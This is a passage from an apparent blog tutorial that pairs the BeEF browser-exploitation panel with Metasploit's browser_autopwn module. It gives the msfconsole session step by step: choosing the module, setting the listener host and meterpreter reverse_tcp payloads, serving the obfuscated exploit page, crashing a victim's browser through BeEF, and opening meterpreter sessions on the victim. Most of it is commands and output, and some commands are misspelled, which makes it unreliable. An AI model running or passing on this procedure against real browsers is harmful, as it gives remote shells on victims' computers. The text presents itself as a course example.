copy file ui/panel and paste on web browser
fill the username and password beef
Open terminal and running metasploit
root@bt:~# msfconsole
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMM
MMMN$ vMMMM
MMMNl MMMMM MMMMM JMMMM
MMMNl MMMMMMMN NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMNM MMMMMMM MMMMM jMMMM
MMMNI WMMMM MMMMMMM MMMM# JMMMM
MMMMR ?MMNM MMMMM .dMMMM
MMMMNm `?MMM MMMM` dMMMMM
MMMMMMN ?MM MM? NMMMMMN
MMMMMMMMNe JMMMMMNMMM
MMMMMMMMMMNm, eMMMMMNMMNMM
MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 787 exploits - 425 auxiliary - 128 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops
=[ svn r14551 updated 47 days ago (2012.01.14)
Warning: This copy of the Metasploit Framework was last updated 47 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
Type "search browser" to find modul for auxiliary
msf > search browser
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/dos/windows/browser/ms09_065_eot_integer 2009-11-10 normal Microsoft Windows EOT Font Table Directory Integer Overflow
auxiliary/dos/windows/smb/ms11_019_electbowser manual Microsoft Windows Browser Pool DoS
auxiliary/gather/android_htmlfileprovider normal Android Content Provider File Disclosure
auxiliary/scanner/http/lucky_punch normal HTTP Microsoft SQL Injection Table XSS Infection
auxiliary/server/browser_autopwn normal HTTP Client Automatic Exploiter
Use "auxiliary/server/browser/_autopown" and type show options to see module options
msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > show options
Module options (auxiliary/server/browser_autopwn):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The IP address to use for reverse-connect payloads
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH no The URI to use for this exploit (default is random)
Setting LHOST and see result on module options
msf auxiliary(browser_autopwn) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
Setting PAYLOAD_WIN32 and JAVA after that type exploit to see result
msf auxiliary(browser_autopwn) > set PAYLOAD_WIN32
PAYLOAD_WIN32 => windows/meterpreter/reverse_tcp
msf auxiliary(browser_autopwn) > set PAYLOAD_JAVA
PAYLOAD_JAVA => java/meterpreter/reverse_tcp
msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed
[*] Setup
[*] Obfuscating initial javascript 2012-03-01 00:38:25 +0700
msf auxiliary(browser_autopwn) > [*] Done in 4.42241719 seconds
Result on exploitation you can see "local ip" it use to exploitation with beef
[*] Using URL: http://0.0.0.0:8080/NWUmoPCg
[*] Local IP: http://192.168.182.3:8080/NWUmoPCg
[*] Server started.
Open again beef-ng on browser
click Command > Network > JBoss, fill the blank as this below. click execute!.
Now see computer victim, browser victim is crash
Open again terminal and type "seassons -l"
Last type "seassons -i 1" and now seen Meterpreter
where your attack vector..?so this just example in course
BalasHapus